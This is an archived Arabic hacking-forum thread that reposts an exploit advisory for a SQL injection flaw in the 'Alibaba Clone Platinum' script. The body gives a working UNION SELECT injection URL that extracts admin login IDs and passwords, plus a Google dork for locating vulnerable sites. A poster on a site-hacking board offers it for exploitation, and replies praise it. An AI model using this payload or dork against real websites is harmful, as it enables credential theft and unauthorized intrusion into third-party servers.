:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability (http://www.vbspiders.com/vb/showthread.php?t=29484)

Dr.NaNo 05-16-2010 02:27 AM

Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability
 
اقتباس:

# title: Alibaba clone platinum (about_us.php) sql injection vulnerability
# edb-id: 12612
# cve-id: ()
# osvdb-id: ()
# author: Cobra_21
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a

view source
print?
-------------------------------------------------------------------------------------------

alibaba clone platinum (about_us.php) sql injection vulnerability

-------------------------------------------------------------------------------------------

author: Cobra_21

mail: uyku_cu@windowslive.com

script home: http://www.alibabaclone.com/

price: $699 usd

dork: Inurl:buyer/about_us.php?buyerid
-------------------------------------------------------------------------------------------

sql injection:

http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin

-------------------------------------------------------------------------------------------






الإستغلال .:


اقتباس:

http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin
الدورك للبحث عن المواقع المصابه في محركات البحث مثل قوقل .:


اقتباس:

inurl:buyer/about_us.php?buyerid


KaLa$nikoV 05-16-2010 06:31 PM

ابداعك وتالقك وصل السماء


مشكور يا غالي

Dr.NaNo 05-17-2010 05:47 PM

تسلم اخي فلكانو ، على الرد الرائع . .والله تسلم ..


تحياتي لك ،، ياغالي .


الساعة الآن 03:36 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0